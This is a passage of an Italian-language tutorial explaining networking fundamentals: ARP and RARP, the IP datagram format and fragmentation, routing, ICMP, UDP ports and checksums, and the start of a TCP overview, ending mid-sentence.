quanto esso ha comunque ricevuto anche l'indirizzo fisico del mittente. Ma allora per ogni pacchetto 
che va spedito a un certo IP address è necessario prima mandare un pacchetto a tutti gli host nella rete? 
E perché allora non mandare direttamente il pacchetto da trasmettere a tutti, invece di chiedere prima 
chi è che ha un certo indirizzo IP? Ovviamente la cosa non funziona così, anche perché si rischierebbe 
di appesantire inutilmente la rete con pacchetti che vengono recapitati ai sistemi sbagliati. Quello che si 
fa è di mantenere presso ogni host una tabella con tutti gli accoppiamenti già trovati, e di aggiornarla 
periodicamente per evitare che diventi obsoleta. A questo punto i meccanismi di broadcasting servono 
ad aggiornare tali tabelle. Per esempio, se un host deve spedire un pacchetto a un certo indirizzo IP, 
prima controlla nella sua tabella se non ha già l'indirizzo fisico del destinatario. Solo nel caso 
l'informazioni manchi, l'host spedisce a tutti gli altri host il messaggio di richiesta. Quando questo 
arriva a un qualunque host, sia esso il vero destinatario o no, ogni host aggiorna la sua tabella con 
l'indirizzo fisico e quello IP del mittente, tanto per guadagnare tempo. Il destinatario, in più, spedisce 
indietro anche il suo indirizzo fisico al mittente, così da potergli permettere di aggiornare la sua tabella 
di indirizzi. Un'ulteriore tecnica che si usa per assicurarsi che tali tabelle siano sempre aggiornate, è 
quella di far distribuire la propria 

coppia di indirizzi, fisico ed IP, ogni qual volta un sistema si connette alla rete, per esempio al reboot. 
ARP non viene considerato propriamente un protocollo internet, quanto un meccanismo della rete 
fisica. Su ARP si basa il protocollo IP per far comunicare fra loro le varie macchine quando non è 
possibile risolvere in altro modo gli indirizzi IP in indirizzi fisici. Un protocollo analogo è il RARP, o 
Reverse Address Resolution Protocol, con il quale una macchina senza disco fisso (diskless) è in grado 
di conoscere il proprio indirizzo IP a partire da quello fisico. Per far ciò la rete deve avere uno o più 
RARP Server, i quali contengono una tabella di associazione fra gli indirizzi IP e quelli fisici di tutte le 
macchine diskless. Anche questo protocollo si basa su un messaggio mandato in broadcasting. 
L'esistenza di questo protocollo è legata al fatto che una macchina diskless non può memorizzare il 
proprio indirizzo IP in alcun posto, non avendo memoria secondaria. 

E veniamo ora al TCP/IP vero e proprio. Come detto prima l'architettura internet è basata su tre livelli. 
L'Application Services è il livello più alto, cioè quello delle applicazioni. I programmi che utilizzate 
quando usate internet ricadono in questo livello. Il Reliable Stream Transport Service è il livello 
intermedio. Esso si occupa dell'affidabilità della comunicazione, gestendo gli errori di trasmissione e la 
perdita di eventuali dati. Esso inoltre fornisce una visione della comunicazione ad alto livello, in cui 
esiste una connessione tra i due host che si trasmettono grandi volumi di dati. Il livello più basso, 
chiamato Connectionless Packet Delivery Service è quello che effettua la spedizione vera e propria dei 
singoli pacchetti, senza garantire l'affidabilità sulla singola trasmissione, nella modalità detta 
connectionless. 

Il protocollo su cui si basa il livello più basso della torre internet è appunto l'Internet Protocol, o IP. 
Tale protocollo si basa su alcuni concetti fondamentali. Innanzi tutto il servizio che fornisce è detto 
unreliable, cioè inaffidabile, in quanto non dà alcun garanzia che il singolo pacchetto arrivi 
effettivamente a destinazione. In secondo luogo è detto connectionless, cioè senza connessione diretta, 
in quanto la trasmissione non avviene direttamente verso il destinatario, ma il messaggio è lanciato 
nella rete lasciando poi a questa il compito di portarlo a destinazione utilizzando l'indirizzo IP dell'host 
destinatario. Infine si parla di best-effort delivery, cioè spedizione al meglio delle possibilità, in quanto 
la rete fa tutto il possibile per portare comunque a destinazione il pacchetto. In pratica l'IP si comporta 
come un naufrago su un'isola deserta che lancia nella corrente un messaggio in una bottiglia per un 


tizio che si trova su di un'altra isola dello stesso arcipelago, contando sul fatto che se la bottiglia arriva 
sull'isola sbagliata qualcuno ributterà a mare il messaggio fintanto che non arriverà a destinazione. 
Detta così c'è quasi da stupirsi che internet funzioni così bene. Anzi, che funzioni del tutto! In realtà 
non dimentichiamoci che sopra al livello più basso ce n'è un altro che garantisce appunto l'affidabilità 
della comunicazione. Torniamo comunque all'IP. Esso è formato da tre regole base: come è fatto il 
pacchetto da trasmettere, detto IP datagram, come avviene la scelta del cammino che il pacchetto segue 
per raggiungere il destinatario, come gli host e i gateway devono trattare i pacchetti e in particolare le 
modalità per l'emissione dei messaggi di errore e quelle per la soppressione dei pacchetti. 

Prima però di entrare nel dettaglio dei singoli campi, vediamo come si comporta l'IP nella gestione dei 
pacchetti di dati. Questo ci permetterà più avanti di comprendere meglio il significato di alcuni campi 
dell'IP datagram. 

Innanzi tutto va ricordato che l'IP è un protocollo unreliable, non dà cioè alcuna garanzia che il singolo 
pacchetto arrivi effettivamente a destinazione, ed è connectionless, ovverosia il messaggio non viene 
spedito direttamente al destinatario ma viene immesso nella rete lasciando poi a questa il compito di 
portarlo a destinazione. Esso inoltre è di tipo best-effort delivery, in quanto la rete fa tutto il possibile 
per portare comunque a destinazione il pacchetto. 

Detto questo, vediamo come avviene la trasmissione vera e propria dei dati. L'unità fisica di 
trasferimento dei dati in una rete è la frame. Questa è composta di due parti: l'intestazione (header) e 
l'area dati (data area). L'unità di misura è invece l'ottetto, formato da otto bit, cioè un byte. Ogni rete 
fisica ha un limite massimo di capacità di trasferimento per un singolo frame, detto Maximum Transfer 
Unit (MTU). L'MTU è cioè il massimo numero di ottetti di dati che può essere trasferito in un singolo 
frame. Per esempio, Ethernet ha generalmente una MTU di 1.500 ottetti (1492 secondo lo standard 
IEEE 802.3). Questo vuol dire che se si devono spedire 2.000 byte di dati via Ethernet, è necessario 
spezzarli in due blocchi tali che ogni blocco sia minore o uguale a 1.500. A ogni blocco si aggiunge poi 
l'intestazione del frame. Dal punto di vista della rete fisica l'IP datagram è un blocco di dati. La rete 
fisica ignora cioè come tali dati vengano utilizzati dall'IP. Quindi, il primo compito di IP è quello di 
decidere come costruire il datagram affinché possa essere trasmesso in un frame fisico. L'ideale sarebbe 
di poter mettere un singolo datagram in ogni frame, ottimizzando così la trasmissione e semplificando 
la logica. Ma quale frame? Quello della rete di partenza? Quello della rete di arrivo? E se durante la 
trasmissione il datagram deve passare attraverso più reti con MTU differenti? Il punto è che non c'è 
modo di fare una scelta che assicuri di avere un datagram per frame. D'altra parte internet ha come 
obiettivo quello di svincolarsi dalle caratteristiche fisiche delle varie reti interconnesse fra loro. E 
allora? La soluzione adottata è molto semplice. Le dimensioni del datagram sono scelte 
convenzionalmente secondo una logica del tutto indipendente dalle MTU delle singole reti fisiche, 
dopodiché, a seconda della rete in 

cui il datagram deve passare, questo è spezzato in più pezzi di dimensioni inferiori alla MTU della rete 
fisica, detti frammenti (fragment). 

Il datagram è anch'esso un frame, che potremmo chiamare logico per distinguerla da quello usata da 
una specifica rete fisica per trasmettere i dati. Come tale anch'esso è formato da una intestazione e da 
un'area dati. All'atto della frammentazione, ogni frammento viene costruito replicando l'header del 
datagram, modificandone alcuni campi che vedremo in seguito, e aggiungendo a questo un pezzo 
dell'area dati originaria. L'aspetto più importante di questo meccanismo è che il riassemblaggio dei 
frammenti non viene effettuato quando i vari frammenti rientrano in una rete fisica ad alto MTU, ma 
sempre e comunque presso l'host di destinazione. Così, se due reti con MTU uguale a 1.500 ottetti sono 
separate da una rete con MTU più bassa, per esempio 500 ottetti, i frammenti che arriveranno a 
destinazione saranno di soli 500 ottetti. In questo caso la frammentazione avviene nel primo gateway 
mentre il riassemblaggio avviene solo nell'host di destinazione. Il protocollo IP richiede che sia gli host 
che i gateway siano capaci di gestire datagram di almeno 576 ottetti. In aggiunta, questi ultimi devono 


essere capaci anche di gestire datagram grandi quanto l'MTU più grande tra quelle delle reti a cui sono 
connessi. Ricordiamo che un gateway, per definizione, ha almeno due connessioni e quindi almeno due 
indirizzi IP. 

Il punto debole di questo meccanismo è che la perdita di anche un solo frammento comporta la perdita 
dell'intero datagram. Dato che ogni frammento è trasmesso indipendentemente, passare attraverso reti a 
bassa MTU comporta un'elevata frammentazione anche nelle reti a maggiore MTU e comunque 
aumenta i rischi di perdita dei dati. Quando un frammento arriva a destinazione, e non è detto che il 
primo arrivi per primo, l'host fa partire un timer. Se questo scade prima che tutti i frammenti siano 
arrivati, il sistema cancella tutti i frammenti e considera perduto il datagram. Il concetto di timer e di 
tempi è estremamente importante per l'IP ed è spesso usato per ottimizzare la rete. Per esempio, ogni 
datagram ha una scadenza. Se il datagram è ancora all'interno della rete quando il suo tempo è scaduto, 
esso viene cancellato definitivamente. Lo scopo è quello di evitare che un pacchetto possa restare 
all'infinito in internet a causa di un errore in una routing table. Queste tabelle infatti servono a gestire il 
processo di instradamento del pacchetto nella rete. Se una o più tabelle sono sbagliate, si potrebbero 
creare cammini chiusi in cui i datagram potrebbero rimanere intrappolati. Veniamo finalmente al 
formato del datagram. Come si è già detto esso è composto di un'intestazione e di un'area dati. L'area 
dati contiene semplicemente una parte dei dati da trasmettere. Questo in quanto il datagram è piccolo 
mentre l'oggetto da trasmettere può essere anche molte centinaia di Kilobyte, se non addirittura 
migliaia, come per esempio un'immagine o un file compresso. L'intestazione è invece alquanto più 
complessa. Vediamola in dettaglio. 

I primi 4 bit contengono la versione del protocollo IP che è stato utilizzato per creare il datagram. 
Infatti, come spiegato nella prima parte di questo corso, il tutto funziona se e solo se tutti seguono le 
stesse regole alla lettera. D'altra parte le convenzioni, e di conseguenza i protocolli, seguono un 
processo di evoluzione, per cui un datagram creato con una versione più recente potrebbe creare 
problemi a un protocollo più vecchio se questi non avesse modo di accorgersene in tempo. I 4 bit 
successivi danno la lunghezza dell'intestazione misurata in parole da 32 bit. Questa è necessaria agli 
algoritmi usati per leggere il datagram (parsing algorithms). Dato che i campi dell'intestazione 
potrebbere non risultare un multiplo intero di 32, è necessario porre alla fine dell'intestazione un campo 
di riempimento. Inoltre il programma di ricezione ha bisogno di conoscere anche la lunghezza totale 
del datagram, cioè la lunghezza dell'intestazione più quella dell'area dati. Questa è memorizzata nei bit 
dal 16 al 31 inclusi, e il suo valore è espresso in ottetti, al contrario del precedente. Poichè il campo è 
lungo 16 bit, il datagram non può essere più grande di 216 ottetti, cioè 65.535 byte. 

Il campo tra la lunghezza dell'intestazione e quella totale del datagram identifica il tipo di servizio che 
va offerto al pacchetto, ed è formato da un campo di 3 bit che specifica l'importanza che va data al 
datagram, e da tre campi da 1 bit ciascuno che identificano il tipo di trasporto desiderato per questo 
pacchetto. Purtroppo questo campo non può essere sempre preso in considerazione da tutte le reti, in 
quanto non sempre la rete fisica è in grado di soddisfare le richieste di priorità e trasporto memorizzate 
in questo campo. Per cui esso viene considerato una sorta di raccomandazione alla rete, piuttosto che 
un vero obbligo. In ogni caso il campo di priorità può contenere valori da 0 a 7. Lo zero è il valore di 
base di un normale pacchetto, mentre il 7 rappresenta la richiesta di precedenza più elevata, e va usato 
per i datagram che contengono dati per il controllo della rete stessa. I tre bit relativi al tipo di trasporto 
servono a definire il livello di qualità relativo al trasferimento del pacchetto. Se impostati a uno, essi 
richiedono rispettivamente: di evitare al massimo ritardi nel recapitare il pacchetto al destinatario, di 
fornire la massima capacità di trasferimento, e di garantire un'elevata affidabilità durante il trasporto. 
Ovviamente è estremamente difficile poter fornire tutti e tre questi servizi contemporaneamente. 
Spesso la rete non riesce a garantirne neanche uno solo. 

I tre campi successivi vengono utilizzati nel meccanismo di frammentazione spiegato poco fa, e in 
particolare sono quelli che permettono all'host che riceve i vari frammenti di riassemblare il tutto per 


ottenere il datagram originario. Essi sono assolutamente necessari in quanto non è prevista alcuna 
comunicazione tra il mittente e il destinatario su come ricomporre il datagram, tanto più che la 
frammentazione finale può essere il risultato di più frammentazioni successive. Inoltre i vari frammenti 
possono arrivare in qualunque ordine, dato che possono avere seguito cammini differenti. Dulcis in 
fundo, anche se l'intestazione di ogni frammento è ottenuta da quella del datagram originale, il quarto 
campo dell'intestazione di un frammento contiene la sua lunghezza totale, e non quella di tutto il 
datagram. Quest'ultima informazione deve essere calcolata dal destinatario in qualche modo. Ed ecco il 
perché di questi tre campi. 

Il primo campo serve a identificare univocamente il datagram ed è lungo 16 bit. Tutti i frammenti che 
appartengono a uno stesso datagram hanno lo stesso identificativo. Il secondo campo è una maschera di 
2 bit che controlla il meccanismo di frammentazione. Il primo bit specifica se il datagram può essere 
frammentato: se impostato a uno, la frammentazione non è permessa. Il secondo bit serve a marcare 
l'ultimo frammento. Vedremo tra un attimo a cosa serve. Il terzo campo contiene la posizione dei dati 
del frammento nel blocco originale di dati misurato in parole da 64 bit. Questo campo si chiama 
fragment offset. Per esempio, se un frammento ha un offset 7, vuol dire che il primo bit dei suoi dati 
corrisponde al quattrocentoquarantanovesimo bit dei dati del frammento originale, dato che 7 * 64 + 1 
fa appunto 449. A questo punto è chiaro come si può ottenere la lunghezza totale del datagram 
originario. Basta sommare l'offset e la lunghezza totale dell'ultimo frammento, riconoscibile grazie al 
secondo bit del campo di controllo. 

Il campo successivo, posto a partire dal 64° bit dell'ntestazione, è lungo un byte e serve a stabilire 
quanto a lungo un datagram può rimanere nella rete. È cioè il campo che specifica la scadenza di un 
datagram di cui avevamo accennato in precedenza. L'idea originaria era che tale campo contenesse il 
numero massimo di secondi che il pacchetto potesse restare nella rete. Tuttavia, data l'evidente 
difficoltà di sincronizzare gli orologi di tutti gli hosts e i gateway della rete, si è deciso di semplificare 
il meccanismo come segue: ogni gateway che processa il pacchetto decrementa il campo di uno quando 
questo arriva e memorizza il tempo di arrivo. Se il pacchetto non riparte subito ma rimane in attesa nel 
gateway, il valore di questo campo viene ulteriormente decrementato di una unità per ogni secondo di 
attesa. Come il campo arriva a zero, il datagram viene cancellato dalla rete e un messaggio di errore 
viene rispedito al mittente. 

Il campo seguente, lungo 8 bit, identifica il protocollo di alto livello utilizzato che ha generato i dati 
contenuti nel datagram, e definisce di fatto il loro formato. Ne riparleremo in seguito, quando vedremo 
i protocolli applicativi. 

Abbiamo quindi un campo di controllo di 16 bit che serve a verificare l'integrità dell'intestazione, e che 
utilizza il meccanismo di checksum ben conosciuto nel mondo del software. In suo valore è la somma 
complementata a uno delle parole da 16 bit che compongono l'intestazione, addizionate con il metodo 
del complemento a uno. 

Quindi vengono gli indirizzi IP del mittente e del destinatario, ognuno lungo 32 bit. Di tali indirizzi e 
del loro scopo abbiamo parlato esaustivamente nella seconda e terza parte di questo corso. 

Per finire abbiamo un campo di lunghezza variabile che può contenere varie opzioni, e quindi il campo 
di riempimento di cui abbiamo già parlato. Queste opzioni non sono presenti in tutti i datagram e 
vengono usate prevalentemente nelle verifiche e nella identificazione dei problemi della rete. 

Parliamo ora di due aspetti fin qui solo accennati: i meccanismi di instradamento dei pacchetti (routing) 
e la gestione degli errori. Iincominceremo a salire nella torre dei protocolli internet, introducendo il 
primo protocollo che si poggia sull'IP, e precisamente lo User Datagram Protocol (UDP). Come 
vedremo si tratta ancora di un protocollo molto legato all'IP, ma comunque considerato al di sopra di 
questo. 

Come abbiamo già detto in precedenza, IP è un protocollo connectionless. Questo vuol dire che non 
esiste un collegamento diretto tra i due host che si scambiano dati, bensì una rete di connessioni 


attraverso la quale si possono identificare vari potenziali cammini da un host all'altro. Il cammino 
attraverso il quale i dati giungono all'host destinatario è scelto dinamicamente e può variare per ogni 
singolo pacchetto di dati. 

Tale scelta non avviene quando il pacchetto parte, ma è il risultato di numerose decisioni prese a ogni 
singolo gateway. Per questo motivo i gateway sono detti anche router. Tali scelte possono dover tenere 
conto di molti elementi, quali la priorità del messaggio, il carico di rete, la capacità delle reti 
intermedie, e via dicendo. La base tuttavia del meccanismo sono le tabelle di instradamento (routing 
table). Vediamo di che si tratta. 

Consideriamo prima una singola rete fisica. Se un host vuole spedire un messaggio a un altro host nella 
stessa rete, non deve far altro che incapsulare il messaggio in un datagramma IP fornendo quindi 
l'indirizzo IP del destinatario, e passare il tutto al livello inferiore. Questi provvederà a ricavare 
dall'indirizzo IP l'identificativo del destinatario nella rete fisica, a incapsulare il datagramma in un 
frame, e a spedire direttamente il tutto all'host finale . Questa tecnica si chiama instradamento diretto 
(direct routing). 

Vediamo adesso quello che succede quando abbiamo due reti interconnesse tramite un gateway. L'host 
mittente si accorge che il destinatario non è nella sua rete fisica, dato che il network id del suo indirizzo 
IP è diverso da quello a cui deve spedire il datagramma. Spedisce allora il messaggio al gateway 
passando sia il datagramma che l'indirizzo IP del gateway al livello inferiore. Il 

messaggio arriva quindi direttamente al gateway che estrae l'indirizzo IP del destinatario, si accorge 
che fa parte della seconda rete a cui è connesso, e spedisce quindi il tutto all'host finale attraverso la 
rete fisica. Questa tecnica si chiama di instradamento indiretto (indirect routing). 

In questo secondo caso la tabella di instradamento è semplice, dato che il gateway ritrasmette sempre i 
messaggi che devono andare da una rete all'altra attraverso la rete fisica. Se invece abbiamo più 
gateway tra i due host, ogni gateway, tranne l'ultimo, dovrà spedire il messaggio a un altro gateway. 
Per far questo userà appunto la tabella di instradamento che fomisce per ogni possibile rete destinataria 
finale l'indirizzo IP del gateway successivo. È da notare che queste tabelle non contengono di solito gli 
indirizzi IP di tutti i possibili host destinatari, cosa che sarebbe fisicamente impossibile, bensì gli 
indirizzi delle reti raggiungibili a partire da quel gateway. Esiste poi la possibilità di specificare un 
gateway di default e cammini specifici per host speciali. La prima cosa è molto comune, mentre la 
seconda è usata solo in casi eccezionali. La logica di instradamento è quindi quella riportata nel 
diagramma. 

La gestione dei messaggi di errore: Come si può facilmente capire dal meccanismo di instradamento 
appena spiegato, non è possibile sapere se il destinatario effettivamente esiste fintanto che il 
datagramma non arriva all'ultimo gateway. In generale l'IP non contiene grossi meccanismi di verifica, 
ed è per questo che è detto "inaffidabile". Esso richiede quindi un protocollo ausiliaro per l'emissione di 
messaggi di errore in rete, che permettano ai protocolli di livello superiore di implementare una logica 
più affidabile e robusta. Tale protocollo è chiamato Internet Control Message Protocol (ICMP). 
L'ICMP è considerato parte integrante dell'IP ed è sostanzialmente un protocollo per la segnalazioni di 
errori il cui utente principale è l'IP stesso. Solo in casi particolari l'ICMP arriva a informare dell'errore 
eventuali livelli superiori all'IP. In ogni caso cosa fare quando avviene un errore non spetta all'ICMP, 
ma ai processi che se ne avvalgono. L'ICMP informa sempre l'IP mittente, non i vari gateway 
intermedi. Questo in quanto del cammino percorso da un datagramma non rimane traccia, per cui 
l'unico possibile destinatario di un messaggio di errore è solo chi ha generato il datagramma. Inoltre, 
dato che i datagrammi ICMP viaggiano incapsulati in datagrammi IP, come un qualunque messaggio di 
livello superiore, essi sono soggetti alle stesse limitazioni in termini di affidabilità di qualunque altro 
messaggio spedito via TCP/IP. Non analizzeremo in dettaglio tutti i datagrammi ICMP, anche perché 
ognuno può avere una struttura differente. Diremo solamente che l'intestazione di un datagramma 


ICMP contiene sempre almeno tre campi: il tipo di messaggio, un codice di errore, e una somma di 
controllo. 

Il livello di Trasporto:Come sicuramente ricorderete, la torre Internet si può schematizzare più o meno 
su quattro livelli. Alla base della torre sta l'hardware che rappresenta la rete vera e propria. Sopra a 
questo sta il primo livello, quello cioè di interfaccia alla rete fisica, detto appunto Network Interface o 
anche Data Link. I protocolli a questo livello si scambiano blocchi di dati chiamati frame, la cui 
struttura è strettamente legata alle caratteristiche hardware della rete stessa. Al di sopra di questo livello 
c'è il livello di interconnessione fra reti, ovverosia il livello dell'IP la cui unità di scambio dati è 
appunto il datagramma IP, mentre il terzo livello è quello detto di Trasporto. Concettualmente è a 
questo livello che si pongono sia il TCP che appunto l'UDP. L'unità di scambio dati al terzo livello si 
chiama pacchetto (transport packet). Il quarto livello è infine quello Applicativo, al quale vengono 
scambiati i messaggi applicativi (message e data stream). 

Abbiamo visto come l'IP permette di scambiare datagrammi fra host, cioè a livello di macchine. 
Tuttavia non è certo la macchina il destinatario finale dei dati che fluiscono nella rete, bensì le 
applicazioni e i programmi che girano su di essa. I moderni sistemi operativi permettono di far girare 
più processi contemporaneamente, e comunque questi non hanno le caratteristiche di permanenza che 
ha invece un host. Un programma infatti è un componente dinamico e temporaneo in un sistema. Non è 
quindi pensabile di poter associare a un processo un identificativo fisso come si fa con gli host e gli 
indirizzi IP. Un processo infatti non ha un identificativo univoco in un sistema, dato che ogni volta che 
viene lanciato esso può assumere un identificativo diverso. Inoltre non è detto che gli stessi dati siano 
sempre processati dalla stessa applicazione. Per esempio, oggi potrei voler usare un certo programma 
per gestire la mia posta elettronica, domani potrei decidere di usarne un altro, e non è sicuramente 
pensabile che si debba informare tutta la rete ogni volta che si decide di cambiare l'applicazione che 
gestisce un certo tipo di dati. Quindi, più che il processo, quello che è importante identificare è la 
funzione, come per esempio, trasferire file oppure spedire posta elettronica. Lo scopo dell'UDP è 
appunto quello di permettere di distinguere in un singolo host più destinatari per i dati che arrivano 
dalla rete. Ma come? 

Facciamo un attimo una digressione. Se io devo stampare un file cosa faccio? Collego al mio computer 
una stampante, attivo il driver corrispondente, e uso una applicazione o un comando del sistema 
operativo per lanciare l'ordine di stampa. Se ora stacco la stampante e ne attacco un'altra alla stessa 
porta non devo far altro che cambiare il driver per continuare a lavorare senza che il sistema si sia 
accorto di niente. Se poi le due stampanti usano lo stesso driver generico devo solo staccare e 
riattaccare fisicamente le stampanti senza modificare il sistema. In generale, tutto lo scambio di dati da 
e verso un computer avviene attraverso porte di I/O. Ogni applicazione accede la porta che gli serve in 
modo dinamico. La periferica di I/O non ha bisogno di sapere con quale applicazione sta parlando: la 
porta fa da schermo fra i due. L'UDP fa una cosa analoga. Esso permette di associare a un indirizzo IP 
più punti di ingresso e di uscita virtuali, detti protocol port. Queste porte si comportano un po' come 
quelle di I/O di un computer. Ogni porta è identificata da un numero intero positivo e i processi 
possono chiedere al sistema l'accesso a tali porte. Quando un processo accede una porta, esso si mette 
in attesa dei dati sulla stessa. Il meccanismo è cioè sincrono. Inoltre, se dei dati arrivano a una porta 
alla quale non si è agganciato ancora un processo, questi vengono mantenuti in memoria nell'ordine di 
arrivo. Si dice cioè che le porte hanno un buffer. A questo punto, sia il processo mittente che quello 
destinatario sono univocamente identificati dall'indirizzo IP dell'host su cui girano e dal numero di 
porta che utilizzano per la trasmissione in rete. Tale associazione è tuttavia 

dinamica, e così come più applicazioni possono stampare sulla stessa stampante purché non 
contemporaneamente, così più processi possono attaccarsi uno alla volta alla stessa porta ed essere visti 
come lo stesso destinatario dalla controparte mittente. Questo permette di spedire un file di testo con un 
word processor, e subito dopo spedire un file binario, per esempio un file ZIP, con un comando di 


sistema. Il tutto sempre attraverso la stessa porta e con lo stesso destinatario in termini di host e di 
processo. 

Come abbiamo visto nel caso dell'IP e dei vari protocolli di rete, anche il datagramma UDP è formato 
da una intestazione (header) e da una parte dati. Esso è inoltre incapsulato in un datagramma IP il quale 
a sua volta è contenuto in un frame della rete fisica. 

Al contrario tuttavia di quello IP, l'header UDP è molto più semplice. Esso è formato dal numero di 
porta del mittente, da quello del destinatario, dalla lunghezza del messaggio UDP, sia dei dati che 
dell'intestazione, e da una somma di controllo (checksum) per la verifica dell'integrità dei dati. Infatti, 
anche l'UDP, come l'IP, è un protocollo cosiddetto "inaffidabile". Questo vuol dire che un messaggio 
UDP può andare perso, essere duplicato, o arrivare nell'ordine sbagliato. L'UDP non fa alcun controllo 
al riguardo. L'affidabilità della comunicazione è infatti affidata a i protocolli di livello più elevato. Tutti 
i campi dell'intestazione sono lunghi 16 bit. Benché il formato del datagramma UDP sia alquanto 
semplice, la sua gestione può essere un po' più complessa. Il punto riguarda la somma di controllo. 
Questo valore è opzionale e, al contrario di quello che succedeva con la somma di controllo nel 
datagramma IP, esso non è relativo solo all'intestazione ma a tutto il datagramma, compresa la parte 
dati. Questo vuol dire che tale campo rappresenta l'unico elemento di controllo a livello IP e UDP 
dell'integrità dei dati arrivati. Se esso non viene utilizzato, il campo va posto a zero. Questo in quanto la 
somma di controllo segue la logica a complemento uno. Il che vuol dire che se la somma calcolata è 
zero, essa può essere memorizzata come 16 bit impostati a uno, dato che in tale logica un valore con 
tutti i bit a uno e uno con tutti i bit a zero rappresentano lo stesso numero. Quindi: se il campo è a zero, 
vuol dire che non è stato utilizzato; se viceversa ha tutti i bit ad 1, vuol dire che la somma era zero. 

La somma di controllo, tuttavia, per ragioni pratiche, non riguarda solo il datagramma UDP, ma viene 
calcolata anche utilizzando alcune informazioni addizionali. Queste formano il cosiddetto pseudo- 
header. 

In pratica, quando si deve calcolare il checksum UDP si mette davanti al datagramma UDP un altro 
blocco di dati che contiene l'indirizzo IP del mittente e del destinatario, il codice del protocollo UDP 
(17), e la lunghezza del datagramma UDP. Il motivo di questa tecnica risiede nel fatto che, per 
verificare se un messaggio UDP è arrivato al giusto destinatario, non basta verificare il numero di 
porta, ma anche l'indirizzo IP dell'host in cui gira il processo che è collegato a quella porta. Il 
datagramma UDP contiene tuttavia solo il numero di porta, per cui il controllo fornito da una somma 
sul solo datagramma non potrebbe realmente verificare che il destinatario dei dati è quello giusto. 
Questa tecnica ha tuttavia un prezzo: gli indirizzi IP fanno parte appunto del livello internet, non di 
quello di trasporto. Perché l'UDP conosca tali informazioni è necessario violare una legge 
fondamentale dei protocolli di comunicazione, e cioè che ogni livello della torre deve gestire i suoi dati 
senza esportarli agli altri livelli a cui offre, o da cui riceve, servizi. Questo vuol dire che la separazione 
tra UDP ed IP non è così pulita come dovrebbe essere, ma che i due protocolli sono in qualche modo 
legati tra loro. D'altra parte i vantaggi in termini di controllo e semplicità di implementazione sono tali 
che si è deciso di fare un'eccezione ai principi dell'architettura. Da notare che la pseudo-intestazione 
serve solo a calcolare la somma di controllo. Essa non viene fisicamente trasmessa con il datagramma 
UDP, dato che le informazioni che contiene fanno già parte dell'intestazione del datagramma IP in cui 
quello UDP sarà incapsulato. 

Se 1’IP rappresenta il braccio del TCP/IP, il TCP ne rappresenta la mente. Il primo si limita a spedire 
rapidamente i dati che gli arrivano senza preoccuparsi troppo se qualcosa va male. Il secondo si occupa 
invece di controllare che l’informazione passatagli dai livelli superiori arrivi correttamente a 
destinazione. Insieme sono sicuramente una coppia molto affiatata. 

In questo articolo useremo il termine applicazioni per indicare tanto i protocolli applicativi come FTP o 
SMTP, quanto i programmi applicativi veri e propri, salvo indicazione contraria. Indicheremo inoltre 


con il termine utente di un servizio colui che utilizza tale servizio, sia esso direttamente una persona, 
un’applicazione, o un protocollo. Per esempio, il TCP è un utente dell’IP. 

C’è subito da dire due cose importanti sul TCP. La prima è che lo standard del TCP non definisce né 
l’implementazione dello stesso, né le modalità con cui un’applicazione accede a i servizi di questo 
protocollo. Esso definisce solamente le caratteristiche di tali servizi, per cui si possono trovare molte 
differenti implementazioni del TCP, ognuna con la propria interfaccia applicativa. Per chi non 
programma ricordo che un’interfaccia applicativa o API (Application Programming Interface) non è 
altro che l’insieme delle funzioni, delle istruzioni, dei parametri e dei blocchi di controllo che vengono 
utilizzati dai programmatori per accedere ai servizi di un sistema. Per esempio, se ho un sistema di 
posta elettronica potrei definire un’ API basata su due funzioni, una chiamata spedisci, e una chiamata 
ricevi . Per ogni funzione sarebbero poi da definire quali informazioni sono da passare al momento 
dell’utilizzo (parametri in ingresso), quali si ottengono una volta espletato il servizio (parametri di 
ritorno), eventuali codici di errore, e le regole di utilizzo delle singole funzioni. Il motivo che sta alla 
base della scelta di non standardizzare l’interfaccia con il TCP è che in molti casi questo protocollo è 
direttamente definito nel sistema operativo, o comunque fa parte del cosiddetto corredo di base di un 
sistema, per cui si è voluto evitare di forzare una sintassi che potesse essere in contrasto con quella 
nativa del sistema ospite. Il secondo punto fondamentale è che il TCP è stato definito per funzionare su 
un qualsiasi sistema di trasmissione dati a pacchetto, e non necessariamente solo sull’IP. Di fatto esso 
può essere poggiato, per esempio, direttamente sopra una rete Ethernet senza bisogno di un livello 
Internet intermedio. 

Ma qual è lo scopo del TCP nell’architettura internet? Il protocollo non fornisce le garanzie di 
affidabilità e robustezza necessarie per implementare un sistema di trasmissione dati sicuro e di facile 
gestione. L’IP è inaffidabile e benché schermi lo sviluppatore dalla conoscenza della rete fisica, 
fornisce ancora una visione di livello troppo basso del sistema di reti interconnesse. Questo vuol dire 
che l’IP è troppo complesso per essere utilizzato direttamente dalle applicazioni. Per avere un 
protocollo di trasmissione affidabile abbiamo bisogno di gestire tutte le possibili situazioni di errore, la 
duplicazione o la perdita dei pacchetti, la caduta delle connessioni o di un router, e via dicendo. Se le 
applicazioni utilizzassero direttamente i servizi dell’IP, ognuna di esse dovrebbe implementare una 
serie alquanto complessa di algoritmi e servizi per tenere conto di tutto ciò. A parte il fatto che esistono 
relativamente pochi programmatori in grado di far questo fra gli svariati milioni di sviluppatori di 
applicazioni, nella maggior parte dei casi si tratterebbe di reinventare ogni volta la ruota. In generale 
questi problemi, seppure complessi, sono abbastanza standard, per cui si è pensato di poggiare sui 
sistemi di trasmissione a pacchetti un protocollo affidabile che potesse essere implementano da 
sviluppatori altamente specializzati, lasciando così agli altri la possibilità di concentrarsi sulla logica 
applicativa piuttosto che sugli aspetti specifici della trasmissione dei dati a basso livello. 

Vediamo allora quali sono le caratteristiche principali del TCP, eventualmente comparate a quelle 
dell’IP. 

Innanzi tutto il TCP fornisce una visione dei dati di tipo a flusso (data stream), cioè i dati sono ricevuti 
in sequenza e nello stesso ordine con il quale sono stati trasmessi. A questo livello cioè, l’utente del 
TCP spedisce i dati come un singolo flusso di byte e nello stesso modo li riceve. Nell’IP avevamo 
invece la divisione dei dati in pacchetti che potevano subire un’ulteriore frammentazione se si 
trovavano a passare attraverso reti caratterizzate da una soglia molto bassa sulle dimensioni dei frame 
fisici. I pacchetti potevano inoltre arrivare in ordine sparso rispetto a quello di trasmissione. 

Secondo punto: nell’IP non si sa mai a priori il cammino che effettua un pacchetto. Il TCP fomisce al 
suo utente una visione del collegamento come se esso fosse una linea dedicata. Ovviamente sotto sotto 
il meccanismo è ancora quello a pacchetti, ma la cosa è schermata agli utilizzatori del TCP. Tale 
caratteristica è detta vitual circuit connection, cioè circuito di connessione virtuale. Il TCP si basi sul 
